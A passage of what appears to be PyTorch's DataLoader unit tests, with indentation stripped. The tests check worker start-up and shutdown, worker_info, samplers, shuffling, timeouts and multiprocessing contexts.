# See TestDataLoader.test_proper_exit for usage
def _test_proper_exit(is_iterable_dataset, use_workers, pin_memory, exit_method,
hold_iter_reference, loader_setup_event, tester_setup_event,
persistent_workers):
num_workers = 2 if use_workers else 0
if exit_method == 'worker_error' or exit_method == 'worker_kill':
assert use_workers is True
if exit_method == 'worker_error':
worker_error_event = mp.Event()
else:
worker_error_event = None
if is_iterable_dataset:
ds = TestProperExitIterableDataset(7, worker_error_event)
else:
ds = TestProperExitDataset(12, worker_error_event)
loader = DataLoader(ds, batch_size=1, shuffle=False,
num_workers=num_workers, pin_memory=pin_memory,
worker_init_fn=set_faulthander_if_available,
persistent_workers=persistent_workers)
error_it = 2
if use_workers:
# 2 is the magical per-worker prefetch number...
# FIXME: change this after the number becomes configurable.
if is_iterable_dataset:
assert len(ds) * num_workers > (error_it + 2 + 1)
else:
assert len(loader) > (error_it + 2 + 1) * num_workers
else:
if is_iterable_dataset:
assert len(ds) > error_it + 1
else:
assert len(loader) > error_it + 1
it = iter(loader)
if use_workers:
workers = it._workers
def kill_pid(pid):
psutil_p = psutil.Process(pid)
psutil_p.kill()
psutil_p.wait(JOIN_TIMEOUT)
assert not psutil_p.is_running()
for i, _ in enumerate(it):
if i == 0:
if not hold_iter_reference:
del it
del loader
loader_setup_event.set()
tester_setup_event.wait()
# ensure that the workers are still alive
if use_workers:
for w in workers:
assert w.is_alive()
if worker_error_event is not None:
worker_error_event.set()
if i == error_it:
if exit_method == 'loader_error':
raise RuntimeError('Loader error')
elif exit_method == 'loader_kill':
kill_pid(os.getpid())
elif exit_method == 'worker_kill':
kill_pid(workers[-1].pid) # kill last worker
if not hold_iter_reference:
# Tries to trigger the __del__ clean-up rather than the automatic
# exiting of daemonic children. Technically it should be automatically
# triggered, but I don't want to rely on the implementation detail of
# Python gc.
gc.collect()
class TestWorkerInfoDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.tensor(self.value)
# Should be used as worker_init_fn with TestWorkerInfoDataset.
# See _test_get_worker_info below for usage.
def test_worker_info_init_fn(worker_id):
worker_info = torch.utils.data.get_worker_info()
assert worker_id == worker_info.id, "worker_init_fn and worker_info should have consistent id"
assert worker_id < worker_info.num_workers, "worker_init_fn and worker_info should have valid id"
assert worker_info.seed == torch.initial_seed(), "worker_init_fn and worker_info should have consistent seed"
dataset = worker_info.dataset
assert isinstance(dataset, TestWorkerInfoDataset), "worker_info should have correct dataset copy"
assert not hasattr(dataset, 'value'), "worker_info should have correct dataset copy"
# test that WorkerInfo attributes are read-only
try:
worker_info.id = 3999
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
try:
worker_info.a = 3
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
for k in ['id', 'num_workers', 'seed', 'dataset']:
assert "{}=".format(k) in repr(worker_info)
dataset.value = [worker_id, os.getpid()]
def _test_get_worker_info():
# get_worker_info returns None in main proc
assert torch.utils.data.get_worker_info() is None
num_workers = 2
batch_size = 2
dataset = TestWorkerInfoDataset(6, batch_size, num_workers)
dataloader = DataLoader(dataset, batch_size=batch_size,
num_workers=num_workers,
worker_init_fn=test_worker_info_init_fn)
it = iter(dataloader)
data = []
for d in it:
data.append(d)
worker_pids = [w.pid for w in it._workers]
data = torch.cat(data, 0)
for d in data:
# each `d` is a [worker_id, worker_pid] pair, which is set in
# test_worker_info_init_fn
assert d[1] == worker_pids[d[0]]
# get_worker_info returns None in main proc after data loading
assert torch.utils.data.get_worker_info() is None
# main proc dataset was never assigned this attribute
assert not hasattr(dataset, 'value')
try:
_ = dataset[0]
except AttributeError:
return
raise RuntimeError('Expected AttributeError')
# test custom init function
def init_fn(worker_id):
torch.manual_seed(12345)
# used with test_error_in_init
class ErrorIterableDataset(IterableDataset):
def __iter__(self):
raise RuntimeError("Error in __iter__")
# used with test_error_in_init
def error_worker_init_fn(_):
raise RuntimeError("Error in worker_init_fn")
class BulkLoadingDataset(Dataset):
def __init__(self, length):
self.length = length
def __getitem__(self, indices):
assert isinstance(indices, (list, tuple))
return torch.as_tensor(indices)
def __len__(self):
return self.length
class BulkLoadingSampler(torch.utils.data.Sampler):
def __init__(self, dataset, batch_size):
self.dataset = dataset
self.batch_size = batch_size
def __iter__(self):
for x in torch.randperm(len(self.dataset)).split(self.batch_size):
yield x.tolist()
def __len__(self):
return int(math.ceil(len(self.dataset) / float(self.batch_size)))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader(TestCase):
def setUp(self):
super(TestDataLoader, self).setUp()
self.data = torch.randn(100, 2, 3, 5)
self.labels = torch.randperm(50).repeat(2)
self.dataset = TensorDataset(self.data, self.labels)
self.persistent_workers = False
def _get_data_loader(self, dataset, **kwargs):
persistent_workers = kwargs.get('persistent_workers', self.persistent_workers)
if persistent_workers and kwargs.get('num_workers', 0) == 0:
persistent_workers = False
kwargs['persistent_workers'] = persistent_workers
return DataLoader(dataset, **kwargs)
def _test_sequential(self, loader):
batch_size = loader.batch_size
if batch_size is None:
for idx, (sample, target) in enumerate(loader):
self.assertEqual(sample, self.data[idx])
self.assertEqual(target, self.labels[idx])
self.assertEqual(idx, len(self.dataset) - 1)
else:
for i, (sample, target) in enumerate(loader):
idx = i * batch_size
self.assertEqual(sample, self.data[idx:idx + batch_size])
self.assertEqual(target, self.labels[idx:idx + batch_size])
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_shuffle(self, loader):
found_data = {i: 0 for i in range(self.data.size(0))}
found_labels = {i: 0 for i in range(self.labels.size(0))}
batch_size = loader.batch_size
if batch_size is None:
for i, (batch_samples, batch_targets) in enumerate(loader):
sample, target = (batch_samples, batch_targets)
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1))
self.assertEqual(sum(found_labels.values()), (i + 1))
self.assertEqual(i, (len(self.dataset) - 1))
else:
for i, (batch_samples, batch_targets) in enumerate(loader):
for sample, target in zip(batch_samples, batch_targets):
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1) * batch_size)
self.assertEqual(sum(found_labels.values()), (i + 1) * batch_size)
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_error(self, loader):
it = iter(loader)
errors = 0
while True:
try:
next(it)
except NotImplementedError:
errors += 1
except StopIteration:
self.assertEqual(errors,
math.ceil(float(len(loader.dataset)) / loader.batch_size))
return
def test_error_in_init(self):
for num_workers in [0, 2]:
loader = self._get_data_loader(ErrorIterableDataset(), num_workers=num_workers)
with self.assertRaisesRegex(RuntimeError, 'Error in __iter__'):
list(iter(loader))
loader = self._get_data_loader(self.dataset, num_workers=2, worker_init_fn=error_worker_init_fn)
with self.assertRaisesRegex(RuntimeError, 'Error in worker_init_fn'):
list(iter(loader))
def test_typing(self):
from typing import List
# Make sure there is no TypeError
class SomeDatasetClass(Dataset[List[torch.Tensor]]):
pass
def _create_dataloader(is_train: bool) -> DataLoader[List[torch.Tensor]]:
pass
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super(RandomDataset).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)),
num_workers=1):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_invalid_assign_after_init(self):
dl = self._get_data_loader(self.dataset)
for attr in ('batch_size', 'sampler', 'batch_sampler', 'drop_last', 'dataset'):
def fn():
setattr(dl, attr, {})
self.assertRaises(ValueError, fn)
def test_sequential_nonbatch(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=None))
def test_sequential_batch(self):
self._test_sequential(self._get_data_loader(self.dataset))
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2))
def test_bulk_loading_nobatch(self):
n = 35
bs = 4
ds = BulkLoadingDataset(n)
sampler = BulkLoadingSampler(ds, batch_size=4)
for num_workers in [0, 4]:
dl = self._get_data_loader(ds, num_workers=num_workers, batch_size=None, sampler=sampler, pin_memory=TEST_CUDA)
self.assertFalse(dl._auto_collation)
samples = list(dl)
self.assertEqual(samples[0].is_pinned(), TEST_CUDA)
self.assertEqual(set(torch.cat(samples, 0).tolist()), set(range(n)))
def test_growing_dataset(self):
dataset = [torch.ones(4) for _ in range(4)]
dataloader_seq = self._get_data_loader(dataset, shuffle=False)
dataloader_shuffle = self._get_data_loader(dataset, shuffle=True)
dataset.append(torch.ones(4))
self.assertEqual(len(dataloader_seq), 5)
self.assertEqual(len(dataloader_shuffle), 5)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_sequential_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
def test_multiple_dataloaders(self):
for multiprocessing_context in supported_multiprocessing_contexts:
loader1_it = iter(self._get_data_loader(self.dataset, num_workers=1))
loader2_it = iter(self._get_data_loader(self.dataset, num_workers=2, multiprocessing_context=multiprocessing_context))
next(loader1_it)
next(loader1_it)
next(loader2_it)
next(loader2_it)
next(loader1_it)
next(loader2_it)
def test_segfault(self):
p = ErrorTrackingProcess(target=_test_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
if IS_WINDOWS:
self.assertIsInstance(p.exception, OSError)
self.assertRegex(str(p.exception), r'access violation reading ')
else:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
finally:
p.terminate()
# Tests if the child process forked by the DataLoader segfaults due to having more than 3 threads
# in the parent process after at least one set_num_threads invocation in the parent process.
# After forking, set_num_threads(1) in the child process entails handling some inherited data-structures
# of the Caffe2 thread-pool of the parent process, culminating in a segfault.
# Reference: https://github.com/pytorch/pytorch/issues/54752
@unittest.skipIf(IS_WINDOWS, "Needs fork")
def test_no_segfault(self):
p = ErrorTrackingProcess(target=_test_no_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
if p.exception:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
self.fail("Segfault occurred in worker process after fork")
finally:
p.terminate()
def test_timeout(self):
if TEST_CUDA and not NO_MULTIPROCESSING_SPAWN:
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# _test_timeout_pin_memory with pin_memory=True initializes CUDA when the iterator is
# constructed.
targets = (_test_timeout, _test_timeout_pin_memory)
else:
targets = (_test_timeout,)
for target in targets:
p = ErrorTrackingProcess(target=target, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader timed out after \d+ seconds')
finally:
p.terminate()
def test_large_sampler_indices(self):
# Test that the data loader cleanly exit when the process errors
# 1. having an reference to the iterator
# 2. using a sampler that yields big elements s.t. _index_queues putters block
#
# More context: https://github.com/pytorch/pytorch/issues/48666
p = ErrorTrackingProcess(target=_test_large_sampler_indices, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'My Error')
finally:
p.terminate()
def test_invalid_ctor_args_combinations(self):
# general
with self.assertRaisesRegex(ValueError, "num_workers option should be non-negative"):
self._get_data_loader(self.dataset, num_workers=-1)
with self.assertRaisesRegex(ValueError, "timeout option should be non-negative"):
self._get_data_loader(self.dataset, timeout=-1)
# disable auto-batching
with self.assertRaisesRegex(ValueError,
"batch_size=None option disables auto-batching and is mutually exclusive"):
self._get_data_loader(self.dataset, batch_size=None, drop_last=True)
valid_ctx = list(torch.multiprocessing.get_all_start_methods())[-1]
with self.assertRaisesRegex(ValueError, r"multi-process loading \(num_workers > 0\), but got"):
self._get_data_loader(self.dataset, num_workers=0, multiprocessing_context=valid_ctx)
with self.assertRaisesRegex(ValueError, "should specify a valid start method in"):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context='bad')
with self.assertRaisesRegex(TypeError, "multiprocessing_context option should be a valid context "):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context=object())
# map-style
sampler = torch.utils.data.SequentialSampler(self.dataset)
batch_sampler = torch.utils.data.BatchSampler(sampler, 3, False)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_size=11, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=3)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, batch_size=11, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, shuffle=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=3, batch_sampler=batch_sampler)
# iterable-style
dataset = CountingIterableDataset(20)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=True)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=torch.utils.data.SequentialSampler(dataset))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=torch.utils.data.BatchSampler(
torch.utils.data.SequentialSampler(dataset), 3, False))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=3)
def test_builtin_collection_conversion(self):
for coll_ty in (list, tuple):
for num_workers in (0, 1):
# map-style dataset
dataset = CountingDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
# iterable-style dataset
dataset = CountingIterableDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
# this IterableDataset isn't configured for each worker, so for
# the equality test below to be valid, we cannot have more than 1 workers.
assert num_workers in [0, 1], "invalid test"
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
def test_iterable_style_dataset(self):
# [no auto-batching] single process loading
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, batch_size=None)
fetched = list(dataloader)
self.assertEqual(len(fetched), 20)
for i, d in enumerate(fetched):
# non-batched should not convert ints into tensors
self.assertIsInstance(d, int)
self.assertEqual(d, i)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# [no auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=None,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = sorted(dataloader_iter)
for a, b in zip(fetched, expected):
# non-batched should not convert ints into tensors
self.assertIsInstance(a, int)
self.assertEqual(a, b)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# When loading more than len(dataset) data, after accessing len(dataloader),
# we should get a warning. See NOTE [ IterableDataset and __len__ ].
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, num_workers=num_workers,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
it = iter(dataloader)
for _ in range(40):
self.assertNotWarn(lambda: next(it), "Should not warn before accessing len(dataloader)")
self.assertEqual(len(dataloader), len(dataset))
self.assertEqual(len(dataloader), 20)
it = iter(dataloader)
for _ in range(20):
self.assertNotWarn(lambda: next(it), "Should not warn before exceeding length")
for _ in range(3):
with self.assertWarnsRegex(
UserWarning,
r"but [0-9]+ samples have been fetched\. For multiprocessing data-loading, this",
msg="Should always warn after exceeding length"):
next(it)
# [no auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7))
self.assertEqual(len(fetched), 3)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
self.assertEqual(fetched[2].tolist(), list(range(14, 20)))
# [auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batches
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 4)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(4)), tuple(range(7)), tuple(range(7, 14)), tuple(range(14, 20))})
# [auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching & drop_last] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7, drop_last=True))
self.assertEqual(len(fetched), 2)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
# [auto-batching & drop_last] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batches
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, drop_last=True,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 2)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(7)), tuple(range(7, 14))})
# [auto-batching & drop_last] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
def test_chain_iterable_style_dataset(self):
# chaining (concatenation)
dataset1 = CountingIterableDataset(20)
dataset2 = CountingIterableDataset(15)
expected = list(range(20)) + list(range(15))
for num_workers in [0, 1]:
for chained_dataset in [dataset1 + dataset2, ChainDataset([dataset1, dataset2])]:
fetched = list(self._get_data_loader(chained_dataset, num_workers=num_workers))
self.assertEqual(len(fetched), len(expected))
for e, d in zip(expected, fetched):
self.assertIsInstance(d, torch.Tensor)
self.assertEqual(e, d)
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(dataset1 + self.dataset))
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(ChainDataset([dataset1, self.dataset])))
def test_multiprocessing_contexts(self):
reference = [
torch.arange(3),
torch.arange(3, 6),
torch.arange(6, 9),
torch.arange(9, 11),
]
counting_ds_n = 11
dl_common_args = dict(num_workers=3, batch_size=3, pin_memory=(not TEST_CUDA))
for ctx in supported_multiprocessing_contexts:
# windows doesn't support sharing cuda tensor; ROCm does not yet fully support IPC
if ctx in ['spawn', 'forkserver'] and TEST_CUDA and not IS_WINDOWS:
ds_cls = CUDACountingDataset
else:
ds_cls = CountingDataset
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
if ctx is not None:
# test ctx object
ctx = mp.get_context(ctx)
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
def test_worker_seed(self):
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
dataloader = self._get_data_loader(dataset, batch_size=batch_size, num_workers=num_workers)
seeds = set()
for batch in dataloader:
seeds.add(batch[0])
self.assertEqual(len(seeds), num_workers)
def test_worker_seed_reproducibility(self):
def get_dataloader():
return DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=torch.Generator().manual_seed(42))
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
self.assertEqual(set(int(batch) for batch in get_dataloader()), set(int(batch) for batch in get_dataloader()))
def test_worker_init_fn(self):
dataset = SeedDataset(4)
dataloader = self._get_data_loader(dataset, batch_size=2, num_workers=2,
worker_init_fn=init_fn)
for batch in dataloader:
self.assertEqual(12345, batch[0])
self.assertEqual(12345, batch[1])
def test_get_worker_info(self):
p = ErrorTrackingProcess(target=_test_get_worker_info)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
finally:
p.terminate()
def test_shuffle(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True))
def test_shuffle_batch_none(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=None, shuffle=True))
def test_shuffle_batch(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True))
def test_shuffle_reproducibility(self):
for fn in (
lambda: DataLoader(self.dataset, shuffle=True, num_workers=0, generator=torch.Generator().manual_seed(42)),
lambda: DataLoader(self.dataset, shuffle=True, num_workers=2, generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
def test_sequential_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, num_workers=4))
def test_seqential_batch_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2, num_workers=4))
def test_seqential_batch_workers_prefetch(self):
self._test_sequential(DataLoader(self.dataset, batch_size=2, num_workers=4, prefetch_factor=3))
def test_shuffle_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True, num_workers=4))
def test_shuffle_batch_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4))
def test_shuffle_batch_workers_prefetch(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, prefetch_factor=3))
def test_random_sampler(self):
from collections import Counter
from torch.utils.data import RandomSampler
def sample_stat(sampler, num_samples):
counts = Counter(sampler)
count_repeated = sum(val > 1 for val in counts.values())
return (count_repeated, min(counts.keys()), max(counts.keys()), sum(counts.values()))
# test sample with replacement
n = len(self.dataset) + 1 # ensure at least one sample is drawn more than once
sampler_with_replacement = RandomSampler(self.dataset, replacement=True, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_with_replacement, n)
self.assertTrue(count_repeated > 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
# test sample without replacement
sampler_without_replacement = RandomSampler(self.dataset)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == len(self.dataset))
# raise error when replacement=False and num_samples is not None
self.assertRaises(ValueError, lambda: RandomSampler(self.dataset, num_samples=len(self.dataset)))
self.assertRaises(ValueError, lambda: RandomSampler(self.dataset, num_samples=0))
# raise error when replacement is non-boolean
with self.assertRaisesRegex(TypeError, "replacement should be a boolean value, but got replacement=0"):
RandomSampler(self.dataset, replacement=0)
def test_random_sampler_len_with_replacement(self):
from torch.utils.data import RandomSampler
# add 5 extra samples
num_samples = len(self.dataset) + 5
sampler = RandomSampler(self.dataset,
replacement=True,
num_samples=num_samples)
# test len method
self.assertEqual(num_samples, len(sampler))
# test with iteration
count_num_samples = sum(1 for _ in sampler)
self.assertEqual(num_samples, count_num_samples)
# test with dataloader, batch_size = 1
batch_size = 1
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples, count_num_samples_in_data_loader)
# test with dataloader, batch_size = 6
batch_size = 6
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(int(math.ceil(float(num_samples) / batch_size)),
count_num_samples_in_data_loader)
def test_distributed_sampler_invalid_rank(self):
from torch.utils.data.distributed import DistributedSampler
dataset = torch.IntTensor(range(10))
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, 3)
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, -1)
def test_duplicating_data_with_drop_last(self):
from torch.utils.data.distributed import DistributedSampler
num_processes = 4
num_batches = 9
data_set = torch.IntTensor(range(num_batches))
scanned_data = torch.IntTensor([])
for i in range(num_processes):
s = DistributedSampler(data_set, num_processes, i)
d_loader = self._get_data_loader(data_set, batch_size=int(num_batches / num_processes), drop_last=True, sampler=s)
for data in d_loader:
scanned_data = torch.cat((scanned_data, data), 0)
self.assertEqual(scanned_data.size(), scanned_data.unique().size())
def test_sampler_reproducibility(self):
from torch.utils.data import RandomSampler, WeightedRandomSampler, SubsetRandomSampler
weights = [0.1, 0.9, 0.4, 0.7, 3.0, 0.6]
for fn in (
lambda: RandomSampler(self.dataset, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: RandomSampler(self.dataset, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: SubsetRandomSampler(range(10), generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
def _test_sampler(self, **kwargs):
indices = range(2, 12) # using a regular iterable
dl = self._get_data_loader(self.dataset, sampler=indices, batch_size=2, **kwargs)
self.assertEqual(len(dl), 5)
for i, (input, _target) in enumerate(dl):
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[i * 2 + 2:i * 2 + 4])
def test_sampler(self):
self._test_sampler()
self._test_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_batch_sampler(num_workers=4, multiprocessing_context='spawn')
def _test_batch_sampler(self, **kwargs):
# [(0, 1), (2, 3, 4), (5, 6), (7, 8, 9), ...]
batches = [] # using a regular iterable
for i in range(0, 20, 5):
batches.append(tuple(range(i, i + 2)))
batches.append(tuple(range(i + 2, i + 5)))
dl = self._get_data_loader(self.dataset, batch_sampler=batches, **kwargs)
self.assertEqual(len(dl), 8)
